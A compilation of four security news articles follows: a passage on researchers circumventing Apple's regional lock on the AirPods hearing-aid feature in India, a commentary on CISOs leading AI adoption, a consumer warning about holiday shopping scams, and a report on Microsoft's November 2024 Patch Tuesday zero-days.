The group members, who have a mix of hardware and software skills and first detailed their hack as part of a technology collective called Lagrange Point, say a couple of dozen people have contacted them asking for help with their AirPods. “We’ve got a huge amount of interest from folks in India who have these AirPods or whose grandparents need them and they’ve not been able to use them,” Jayasimha says. Others have documented the same issue in social media posts.

The researchers demonstrated that they could bypass Apple’s geographic restrictions with a set of AirPods Pro 2 connected to a 10th generation Wi-Fi-only iPad. They note that it would be possible to do the workaround on an iPhone or iPad connected to a mobile carrier as well, but it would be more involved.

To find the workaround, the researchers first looked at the different ways that iOS establishes where a device is in the world. For Wi-Fi-only devices, there are a few checks. The server looks at which Apple Store region the device is connected to, as well as the time zone, language, and region the device is set to. Additionally, the operating system sends a simple web request to an Apple web service that then responds with the country code of the country the device appears to be in based on the location associated with its IP address.

The researchers first tried manually changing the time zone and region settings for the iPad, but it ultimately wasn’t clear whether this impacted their ability to hide the iPad’s true location. When masking the iPad’s IP address so it would appear to be connected in the United States didn’t work, the researchers assessed other metrics the device might be using to establish its geographic location. It turns out that iOS also examines Wi-Fi “service set identifiers,” or SSIDs, that help devices connect to the right Wi-Fi network when there are many network signals in the air—like in an apartment building or at a coffee shop.

The operating system also uses GPS triangulation and device identifier “MAC addresses” of nearby devices, including routers, to establish a device’s location. In other words, even if a person in Bangalore uses a proxy to make it seem like their iPad has a US-based IP address, all the nearby routers and devices are associated with India-located IP addresses that give the real location away.

To deal with this, the researchers rigged up a Faraday cage, which blocks electromagnetic signals, to isolate the iPad from the other devices and wireless networks around it. They built their aluminum-foil-clad enclosure on top of a regular kitchen microwave and then turned on the microwave whenever they wanted to block signals to the iPad. The setup worked because consumer microwaves heat food using electromagnetic waves that are at the same frequency as Wi-Fi signals—2.4 GHz. Essentially, the researchers had turned their microwave oven into a Wi-Fi jammer.

The hackers first built a Faraday cage using a cardboard box and several sheets of aluminum foil, and placed it on top of a microwave to further block wireless signals.Photograph: Lagrange Point/Rithwik Jayasimha

“We put several layers of aluminum inside and outside \[a cardboard box\] and we’d see some signal strength drop,” Bansal says. “Of course, it’s not going to be great, but combined with the microwave, it worked.”

Ultimately, the researchers designed a less ingenious, but simpler and more reliable Faraday cage to make their manipulation more practical. With the iPad placed in its own shielded bubble, the researchers used an open source Wi-Fi location database and Wi-Fi SSID cycling tool to trick iOS into locating the iPad in California. With this complete, the AirPods could work as hearing aids in India.

Apple offers the hearing aid features in more than 100 countries, and it has great promise as a tool for making hearing aid tech more accessible—and more palatable—to millions of people around the world. But the company isn’t able to offer the feature everywhere and restricts access in certain countries, like India, likely because of regulatory hurdles related to medical devices. The fact that it’s possible to circumvent these restrictions may offer a solution, at least temporarily, for people in blocked countries who are looking for a workaround.

Apple did not return WIRED’s request for comment about the findings, but the researchers note that it seems like it would be possible for Apple to close the loophole they discovered fairly easily. They say they haven’t heard from the company.

Alan Woodward, a cybersecurity professor at the University of Surrey, says their work is “very interesting” and demonstrates how there may often be ways around “safeguards” put in place by Big Tech. “It shows that those with the technical understanding can bypass the geofencing of apps relatively simply,” Woodward says. “Not that everyone could do it, but they probably know someone that can.”

“I’m not sure how many people realize the number of variants in something like iOS even on what is apparently the same version—the build number is what really matters,” Woodward says. “It’s more a lesson to people that you have more than you realize on your phone.”

The second version of the Faraday cage, which the researchers plan to use to run more experiments.Photograph: Lagrange Point/Rithwik Jayasimha

Services offered by Big Tech companies such as Apple and Google often have had staggered launches around the world as lawmakers have introduced regulations to control technology companies’ power and protect people’s rights. In the EU, for instance, several AI products have been delayed or not launched due to strict privacy laws. Apple has also been required to allow alternative App Stores due to EU rules. At the same time, right-to-repair movements have grown in popularity, and people have increasingly been hacking into the products they buy.

While the three researchers in India believe that it is likely Apple’s hearing aid features will officially come to the country in the coming months, they plan in the meantime to help the dozens of people they say have reached out to them about their own headphones. They also plan on using the second version of the Faraday cage to set up people’s AirPods. From their own grandmas’ experiences, the hearing aid features appear to be valuable in their everyday lives.

Bansal says his grandma has some hearing loss and other health challenges, but has typically worn hearing aids while watching television. “She used to wear her old clunky hearing aids, and they were really problematic because they had these tiny little buttons on them,” Bansal says. “But now she uses the AirPods, we’ve set it up with her hearing profile, and she can use it to watch the TV just fine and it’s a lot nicer. She doesn’t feel like a patient wearing it.”

These Guys Hacked AirPods to Give Their Grandmas Hearing Aids

CISOs understand the risk scenarios that can help create safeguards so everyone can use AI safely and focus on the technology's promises and opportunities.

Lucas Moody, Chief Information Security Officer, Alteryx

November 13, 2024

4 Min Read

Source: Andreas Prott via Alamy Stock Photo

COMMENTARY

No one wants to miss the artificial intelligence (AI) wave, but the "fear of missing out" has leaders poised to step onto an already fast-moving train where the risks can outweigh the rewards. A PwC survey highlighted a stark reality: 40% of global leaders don't understand the cyber-risks of generative AI (GenAI), despite their enthusiasm for the emerging technology. This is a red flag that could expose companies to security risks from negligent AI adoption. This is precisely why a chief information security officer (CISO) should lead in AI technology evaluation, implementation, and governance. CISOs understand the risk scenarios that can help create safeguards so everyone can use the technology safely and focus more on AI's promises and opportunities. 

**The AI Journey Starts With a CISO **

Embarking on the AI journey can be daunting without clear guidelines, and many organizations are uncertain about which C-suite executive should lead the AI strategy. Although having a dedicated chief AI officer (CAIO) is one approach, the fundamental issue remains that integrating any new technology inherently involves security considerations. 

The rise of AI is bringing security expertise to the forefront for organizationwide security and compliance. CISOs are critical to navigating the complex AI landscape among emerging new regulations and executive orders to ensure privacy, security, and risk management. As a first step to an organization's AI journey, the CISOs are responsible for implementing a security-first approach to AI and establishing a proper risk management strategy via policy and tools. This strategy should include:   

Related:Dark Reading Confidential: Pen-Test Arrests, 5 Years Later

*   Aligning AI goals: Establish an AI consortium to align stakeholders and the adoption goals with your organization's risk tolerance and strategic objectives to avoid rogue adoption.  
    

*   Collaborating with cybersecurity teams: Partner with cybersecurity experts to build a robust risk evaluation framework.  
    

*   Creating security-forward guardrails: Implement safeguards to protect intellectual property, customer and internal data, and other critical assets against cyber threats.  
    

**Determining Acceptable Risk **

Although AI has plenty of promise for organizations, rapid and unrestrained GenAI deployment can lead to issues like product sprawl and data mismanagement. Preventing the risk associated with these problems requires aligning the organization's AI adoption efforts.  

CISOs ultimately set the security agenda with other leaders, like chief technology officers, to address knowledge gaps and ensure the entire business is aligned on the strategy to manage governance, risk, and compliance. CISOs are responsible for the entire spectrum of AI adoption — from securing AI consumption (i.e., employees using ChatGPT) to building AI solutions. To help determine acceptable risk for their organization, CISOs can establish an AI consortium with key stakeholders that work cross-functionally to surface risks associated with the development or consumption of GenAI capabilities, establish acceptable risk tolerances, and act as a shared enforcement arm to maintain appropriate controls on the proliferation of AI use. 

Related:Varonis Warns of Bug Discovered in PostgreSQL PL/Perl

Suppose the organization is focused on securing AI consumption. In that case, the CISO must determine how employees can and cannot use the technology, which can be whitelisted or blacklisted or more granularly managed with products like Harmonic Security that enable a risk-managed adoption of SaaS-delivered GenAI tech. On the other hand, if the organization is building AI solutions, CISOs must develop a framework for how the technology will work. In either case, CISOs must have a pulse on AI developments to recognize the potential risks and stack projects with the right resources and experts for responsible adoption. 

Related:The Vendor's Role in Combating Alert Fatigue

**Locking in Your Security Foundation  **

Since CISOs have a security background, they can implement a robust security foundation for AI adoption that proactively manages risk and establishes the correct barriers to prevent breakdowns from cyber threats. CISOs bridge the collaboration of cybersecurity and information teams with business units to stay informed about threats, industry standards, and regulations like the EU AI Act.  

In other words, CISOs and their security teams establish comprehensive guardrails, from assets management to robust encryption techniques, to be the backbone of secure AI integration. They protect intellectual property, customer and internal data, and other vital assets. It also ensures a broad spectrum of security monitoring, from rigorous personnel security checks and ongoing training to robust encryption techniques, to respond promptly and effectively to potential security incidents. 

Remaining vigilant about the evolving security landscape is essential as AI becomes mainstream. By seamlessly integrating security into every step of the AI life cycle, organizations can be proactive against the rising use of GenAI for social engineering attacks, making distinguishing between genuine and malicious content harder. Additionally, bad actors are leveraging GenAI to create vulnerabilities and accelerate the discovery of weaknesses in defenses. To address these challenges, CISOs must be diligent by continuing to invest in preventative and detective controls and considering new ways to disseminate awareness among the workforces.   

**Final Thoughts  **

AI will touch every business function, even in ways that have yet to be predicted. As the bridge between security efforts and business goals, CISOs serve as gatekeepers for quality control and responsible AI use across the business. They can articulate the necessary ground for security integrations that avoid missteps in AI adoption and enable businesses to unlock AI's full potential to drive better, more informed business outcomes.    

**About the Author**

Chief Information Security Officer, Alteryx

Lucas Moody is chief information security officer (CISO) at Alteryx and is focused on protecting Alteryx products, customers, and the business from cyber threats. Lucas is a technical security leader with extensive experience spanning enterprise and consumer software companies across the technology, financial, social networking, and retail sectors. He is a global-minded executive noted for his ability to drive security outcomes while enabling growing businesses to accelerate. His passion for technology, security, and building amazing teams has helped companies thrive during periods of hyper-growth and change.

How CISOs Can Lead the Responsible AI Charge

Where there’s a gift to be bought, there’s also a scammer out to make money. Here's how to stay safe this shopping season.

It’s that time of year again. Thanksgiving will pass just as quickly as it arrived, and the festive season will soon hit full swing as countless people go online for some gift shopping. But where there’s a gift to be bought, there’s also a scammer out to make money.

And make money they do. In the last five years, the Internet Crime Complaint Center (IC3) said it has received 3.79 million complaints for a wide range of internet scams, resulting in $37.4 billion in losses. 

Today, we’re warning of several online threats that could target you over the next few weeks and months: brand impersonation and fakes, credit card skimming, and malvertising. 

**1\. **Brand impersonation scams** **

This Black Friday and beyond, you’re likely to see scammers ripping off big name brands. Here are a few fakes you should look out for. 

****Temu ads offer discounted PS5s** **

Scrolling through Facebook, we were presented with a couple of posts advertising discounted PS5s. 

> “Quit overspending on PS5! This one I got off TEMU is AWESOME and is much cheaper. I’d highly recommend picking this up!” 

Of course, it’s tempting to get a discount on high-value items like a PlayStation 5, but Temu doesn’t actually sell PS5s.

If you click the play button on the “video,” you are instead redirected to a Temu page selling various PlayStation accessories that are not official or in any way approved by Sony.  

****Fake Amazon offers you great deals this Black Friday** **

Amazon is relatively low cost, it’s convenient, and you can look at someone’s wish list on there. Except in this scam we caught online, the website isn’t really Amazon—check out the URL. 

Fake online stores like this use Amazon’s branding to sell counterfeit products. Even if you take the risk and buy a knock off product (which we think is a bad idea), you have no guarantee of receiving the merchandise, and definitely no buyer protection. 

****Walmart makes it easy for you to buy gift cards** **

Nothing says “I saw this and thought of you” like a Walmart gift card on Christmas day. But make sure you are buying from the right website.  

Again, in this example, check out the URL—this website might look Walmart, but it’s a fake that will happily take your money in exchange for nothing. 

****“USPS” now delivers you fraud** **

If you’re taking advantage of Black Friday sales and buying many things at once, it can be tricky to keep track of what you’ve ordered. Even if you do know what’s coming, you often don’t know which package service will deliver it to your door. Scammers take advantage of this and will send fake delivery notice emails that encourage you to click on them. 

With this fake USPS site, you are asked to pay a small fee to have your delivery processed. However, once you hand over your card details the scammers can take whatever amount they like and sell your details to other criminals. 

These scams are very common. In fact, when we looked, we saw 50 fake USPS sites set up in only a day: 

**2\. **Credit card skimmers** **

We’re seeing a lot of online stores hosting credit card skimmers, especially smaller retailers.  

A credit card skimmer is a piece of malware that is injected into a website, often through vulnerabilities in the content management system (CMS) or the plugins that the site owner uses. 

When visiting a site that has a card skimmer on it, you’ll likely have no idea it’s even there. However, a single script injection is enough to steal your credit card data. 

Last year, we saw a large uptick in card skimmers just before the holiday season. One particular campaign that we tracked peaked in April 2023, but then really slowed down during the summer months. Across months, cybercriminals had infected multiple websites and built custom templates to trick victims into handing over their credit card details. By October, the same campaign had increased to its highest volume yet, and it is highly likely that this year will be the same. 

When looking at compromised websites, it can be hard to tell what—if anything—is wrong. However, if a site looks like it hasn’t been maintained in a while (for example, it displays outdated information, such as ‘Copyright 2022′) you should avoid entering in your card details. Most compromises happen because a website’s CMS and its plugins are outdated and vulnerable. 

Our free browser extension Malwarebytes Browser Guard blocks credit card skimmers by default. If you visit a compromised store you’ll be shown a warning like this: 

Access to the store isn’t blocked, we just block the skimmer code so it can’t load. And while you could in theory still shop safely, we’d still advise you to avoid buying anything from there. 

Malvertising—or malicious advertising—is a favorite of scammers, who use online ads and sponsored search results to deliver malware to their unsuspecting victims.  

Malvertising doesn’t require that criminals know a victim’s email address, login credentials, or personal information to deliver them malware. All the scammers need to do is fool someone into clicking on an ad that looks legitimate.  

Last fall, Malwarebytes tracked a 42% increase month-over-month in malvertising incidents in the US. This year we’re seeing a similar uptick, with a 41% increase from July to September as we head into the holiday shopping season. 

In terms of the actual advertiser accounts that are used in malvertising campaigns, most are based in the US and are set up using a combination of fake identities or hijacked accounts. However, according to our research findings, ads originating in Pakistan and Vietnam account for 90% of the fraud. 

Most (77%) of the accounts are used once only—created quickly and then burned. Once that account is dead, cybercriminals spin up the next one and on it goes.  

No brand is safe from malvertisers. We’ve tracked campaigns that spoof Google, Amazon, eBay, Walmart, Lowe’s—and even Malwarebytes.  

Our advice: It’s not always easy to tell a real ad from a scam, so it’s best to avoid clicking on sponsored ads at all. Use genuine search results or navigate directly to the site yourself. 

****How to shop safely this holiday season**  **

*   **Remember: If it’s too good to be true then it probably is.** Discounted items are tempting—especially at a time of year when lots of spending takes place—but these offers often amount to nothing. Instead, research the best deal at reputable retailers. 

*   **Don’t get rushed into making decisions.** Scammers will use a sense of urgency to pressure you into performing quick actions before you can properly think things through. Take your time before doing anything like clicking links or entering card details. 

*   **Get an ad and malicious content blocker like** **Malwarebytes Browser Guard.** If you’re blocking ads then you can’t be tricked into clicking on them. Browser Guard (which is free!) also protects against credit card skimming and other online threats. 

*   **Keep an eye on your financial statements:** An uptick in online shopping deserves an uptick in vigilance with checking online bank accounts, credit card statements, investment portfolios—in fact, any financial account data. Flag anything that seems suspicious with your provider. 

*   **Protect your online accounts.** Use a different password for every account (a password manager is super helpful in generating and storing all your passwords), and set up multi-factor authentication (MFA) wherever you can.  

*   **Protect your devices:** Most security products offer some kind of web protection that detects malicious domains and IP addresses, including Malwarebytes Premium which offers web and phishing protection. 

*   **Clean up your personal data online:** Cybercriminals use publicly available information in their scams, so check what information is available about you online using our free Digital Footprint scan. You can also take the first step in removing your personal information from the network of data brokers online with our Personal Data Remover. 

_Thanks to Jerome Segura for his research on this piece._

 Warning: Online shopping threats to avoid this Black Friday and Cyber Monday  

The November 2024 Patch Tuesday update contains a substantially high percentage of remote code execution (RCE) vulnerabilities (including a critical issue in Windows Kerberos), and two other zero-day bugs that have been previously disclosed and could soon come under attack.

Source: Rix Pix Photography via Shutterstock

Attackers are already actively exploiting two vulnerabilities for which Microsoft issued patches on Nov. 12 as part of its monthly security update. And they could soon begin targeting two other publicly disclosed, but as yet unexploited, flaws.

The four zero-day bugs are among a set of 89 common vulnerabilities and exposures (CVEs) that Microsoft addressed in November's Patch Tuesday. The batch contains a substantially high percentage of remote code execution (RCE) vulnerabilities, in addition to the usual collection of elevation of privileges flaws, spoofing vulnerabilities, security bypass, denial-of-service issues, and other vulnerability classes. Microsoft identified eight of the flaws as issues that attackers are more likely to exploit, though researchers pointed to other flaws as well that are of likely of high interest to adversaries.

**Microsoft Adopts CSAF Standard**

Along with the November security update, Microsoft also announced its adoption of Common Security Advisory Framework (CSAF), an OASIS standard for disclosing vulnerabilities in machine-readable form. "CSAF files are meant to be consumed by computers more so than by humans," Microsoft said in a blog post. It should help organizations accelerate their vulnerability response and remediation processes, the company noted.

"This is a huge win for the security community and a welcome addition to Microsoft’s security pages," said Tyler Reguly, associate director of security R&D at Fortra, via email. "This is a standard that has been adopted by many software vendors and it is great to see that Microsoft is following suit."

**Zero-Day Bugs Under Active Exploit**

One of the zero-day bugs that attackers are already actively exploiting is CVE-2024-43451 (CVSS 6.5 out of 10), a flaw that discloses a user's NTLMv2 hash for validating credentials in Windows environments. The hashes allow attackers to authenticate as legitimate users, and access applications and data to which they have permissions. The vulnerability affects all Windows versions and requires minimal user interaction to exploit. Merely selecting or inspecting a file could trigger the vulnerability, Microsoft warned.

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

Don't miss the upcoming free Dark Reading Virtual Event, "Know Your Enemy: Understanding Cybercriminals and Nation-State Threat Actors," Nov. 14 at 11 a.m. ET. Don't miss sessions on understanding MITRE ATT&CK, using proactive security as a weapon, and a masterclass in incident response; and a host of top speakers like Larry Larsen from the Navy Credit Federal Union, former Kaspersky Lab analyst Costin Raiu, Ben Read of Mandiant Intelligence, Rob Lee from SANS, and Elvia Finalle from Omdia. Register now!

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_

"To my knowledge, it's the third such vulnerability that can disclose a user's NTLMv2 hash that was exploited in the wild in 2024," Satnam Narang, senior staff engineer at Tenable, wrote in an emailed comment. The other two are CVE-2024-21410 in Microsoft Exchange Server from February, and CVE-2024-38021 in Microsoft Office from July.

"One thing is certain," according to Narang. "Attackers continue to be adamant about discovering and exploiting zero-day vulnerabilities that can disclose NTLMv2 hashes."

The second bug under active exploit in Microsoft's latest update is CVE-2024-49039 (CVSS 8.8), a Windows Task Scheduler elevation of privilege bug that allows an attacker to execute remote procedure calls (RPC) normally available only to privileged accounts.

"In this case, a successful attack could be performed from a low privilege AppContainer," Microsoft said. "The attacker could elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment."

The fact that it was Google's Threat Analysis Group that discovered and reported this flaw to Microsoft suggests that the attackers currently exploiting the flaw are either a nation-state-backed group or other advanced persistent threat actor, Narang said.

"An attacker can perform this exploit as a low-privileged AppContainer and effectively execute RPCs that should be available only to privileged tasks," added Ben McCarthy, lead cybersecurity engineer at Immersive Labs, via email. "It is unclear what RPCs are affected here, but it could give an attacker access to elevate privileges and execute code on a remote machine, as well as the machine in which they are executing the vulnerability."

**Previously Disclosed but Unexploited Zero-Days**

One of the two already disclosed — but not yet exploited — zero-days is CVE-2024-49019 (CVSS 7.8), an elevation-of-privilege vulnerability in Active Directory Certificate Services that attackers could use to gain domain administrator access. Microsoft's advisory listed several recommendations for organizations to secure certificate templates, including removing overly broad enrollment rights for users or groups, removing unused templates, and implementing additional measures to secure templates that allow users to specify a subject in the request.  

Microsoft is tracking the other publicly disclosed but unexploited flaw as CVE-2024-49040 (CVSS 7.5), a Windows Exchange Server spoofing flaw. "The primary issue lies in how Exchange processes ... headers, enabling attackers to construct emails that falsely appear to be from legitimate sources," Mike Walters, president and co-founder of Action1, wrote in a blog post. "This capability is particularly useful for spear phishing and other forms of email-based deception."

**RCE Security Bugs Have a Big Month**

Nearly 60% of the bugs — 52 of 89 — that Microsoft disclosed in its November update are RCE vulnerabilities that allow remote attackers to execute arbitrary code on vulnerable systems. Some allow for unauthenticated RCE, while others require an attacker to have authenticated access to exploit the bug. Most of the RCEs in Microsoft's latest update affect various versions of MS SQL Server. Other impacted technologies include MS Office 2016, MS Defender for iOS, MS Excel 2016, and Windows Server 2012, 2022, and 2025, said Will Bradle, security consultant at NetSPI, in an emailed statement.

Among the most critical of the RCEs, according to Walters, is CVE-2024-43639 in Windows Kerberos. The bug has a near-maximum CVSS severity score of 9.8 of 10 because, among other things, an unauthenticated attacker can exploit it remotely. Microsoft itself has assessed the bug as something that attackers are less likely to exploit. But putting it on the back burner for that reason could be a mistake.

"Kerberos is a fundamental component of Windows environments, crucial for authenticating user and service identities," Walters added. "This vulnerability turns Kerberos into a high-value target, allowing attackers to exploit the truncation flaw to craft messages that Kerberos fails to process securely, potentially enabling the execution of arbitrary code."

Bradle pointed to CVE-2024-49050 in Visual Studio Code Python Extension as another RCE in this month's set that merits priority attention. "The extension currently has over 139 million downloads and is affected by an RCE vulnerability with a base CVSS score of 8.8," he said. "Microsoft has patched the VSCode extension, and updates should be installed immediately."

Immersive Labs' McCarthy also identified multiple other flaws that organizations would do well to address quickly. They include the critical CVE-2024-43498 (CVSS 9.8), an RCE in .NET and Visual Studio; CVE-2024-49019 (CVSS 7.8), an Active Directory privilege escalation flaw; CVE-2024-49033 (CVSS 7.5), a Microsoft Word security bypass flaw; and CVE-2024-43623 (CVSS 7.8), a privilege escalation flaw in the Windows NT OS kernel that enables attacker to gain system level access on affected systems. Importantly, Microsoft has assessed the latter vulnerability as one that attackers are more likely to exploit.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Tag

#ios